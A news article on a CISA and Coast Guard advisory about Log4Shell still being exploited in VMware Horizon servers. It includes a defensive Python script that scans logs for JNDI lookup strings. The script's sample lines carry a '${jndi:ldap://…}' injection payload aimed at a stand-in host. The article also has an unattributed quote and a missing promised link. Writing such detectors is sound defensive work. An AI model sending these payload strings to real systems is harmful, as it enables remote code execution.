Hackers Continue to Exploit the Log4Shell Vulnerability in VMware Horizon Systems

The US Cybersecurity and Infrastructure Security Agency (CISA) and the US Coast Guard Cyber Command (CGCYBER) announced in a cybersecurity advisory (CSA) that the Log4Shell vulnerability (CVE-2021-44228) is still being exploited by attackers.

The hacker groups observed still exploiting the vulnerability include "APT" groups, and they have been seen attacking VMware Horizon servers and Unified Access Gateway (UAG) to gain initial access to organizations that have not applied the available patches.

The CSA provides information, including tactics, techniques, and procedures and indicators of compromise, derived from two related incident response engagements and from malware analysis of samples found on the victim networks.


For those unfamiliar with Log4Shell, it is a vulnerability that first surfaced in December and targets a flaw in Apache Log4j, a popular framework for organizing logging in Java applications. It allows arbitrary code to be executed when a specially crafted value in the format "{jndi: URL}" is written to the log.

The vulnerability is notable because the attack can be carried out against Java applications that log values obtained from external sources, for example by displaying problematic values in error messages.
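The logging path described above can be checked from the defender's side by searching stored logs for JNDI lookup strings. The following is an added example, not code from the article or the advisory; it assumes the standard Log4j lookup syntax `${jndi:URL}`, and the log lines, addresses and host name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# A Log4j JNDI lookup: ${jndi:<scheme>://<host>...}; capture scheme and host.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s:}]+)", re.IGNORECASE)

# Constructed sample access-log lines (documentation IPs, .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Jan/2022:10:01:05 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "${jndi:ldap://callback.example.invalid/a}"',
    '198.51.100.4 - - [10/Jan/2022:10:02:11 +0000] "GET /?q=%24%7Bjndi%3Aldap'
    '%3A%2F%2Fcallback.example.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.4 - - [10/Jan/2022:10:02:40 +0000] "GET /docs/jndi-overview.html '
    'HTTP/1.1" 200 2048 "-" "curl/7.79"',
]


def find_jndi_lookups(line):
    """Return (scheme, host) for every JNDI lookup string in one log line."""
    # Web servers log the request percent-encoded, so decode before matching.
    # Decoding twice also covers values that were encoded a second time.
    decoded = unquote(unquote(line))
    return [(m.group(1).lower(), m.group(2).lower())
            for m in JNDI_RE.finditer(decoded)]


def triage(lines):
    """Map each remote host named in a lookup to the log lines that carry it."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        for _scheme, host in find_jndi_lookups(line):
            hits.setdefault(host, []).append(number)
    return hits


if __name__ == "__main__":
    for host, numbers in triage(SAMPLE_LOG).items():
        print(f"{host}: seen on log lines {numbers}")
```

A hit only shows that a lookup string reached the log; whether the logging library acted on it depends on the Log4j version the application runs.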

Almost all projects that use frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected, including Steam, Apple iCloud, and Minecraft clients and servers.

The full advisory details several recent cases in which attackers successfully exploited the vulnerability to gain access. In at least one confirmed compromise, the actors collected and extracted sensitive information from the victim's network.

Threat hunting conducted by the US Coast Guard Cyber Command shows that threat actors exploited Log4Shell to gain initial network access at an undisclosed victim. They uploaded the malware file "hmsvc.exe", which masquerades as the Microsoft Windows SysInternals LogonSessions security utility.

An executable embedded in the malware has various capabilities, including keystroke logging and execution of additional payloads, and provides a graphical user interface to access the victim's Windows desktop system. It can function as a command-and-control tunneling proxy, allowing a remote operator to reach further into a network, the agencies say.

The analysis also found that hmsvc.exe was running as a local system account with the highest possible privilege level, but did not explain how the attackers elevated their privileges to that point.

CISA and the Coast Guard recommend that all organizations install updated builds to ensure that affected VMware Horizon and UAG systems run the latest version.

The advisory added that organizations should always keep software up to date and prioritize patching known exploited vulnerabilities. Internet-facing attack surfaces should be minimized by hosting essential services in a segmented demilitarized zone.

"Based on the number of Horizon servers in our data set that are unpatched (only eighteen percent were patched as of last Friday night), there is a high risk that this will seriously affect hundreds, if not thousands, of businesses. This week also marks the first time we have seen evidence of widespread escalation, from gaining initial access to beginning to take hostile actions on Horizon servers."

Doing so ensures strict access controls at the network perimeter and avoids hosting Internet-facing services that are not essential to business operations.

CISA and CGCYBER encourage users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not applied immediately after the release of the VMware updates for Log4Shell, treat all affected VMware systems as compromised. See the CSA "Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems" for more information and additional recommendations.

Finally, if you are interested in knowing more about it, you can check the details in the following link.

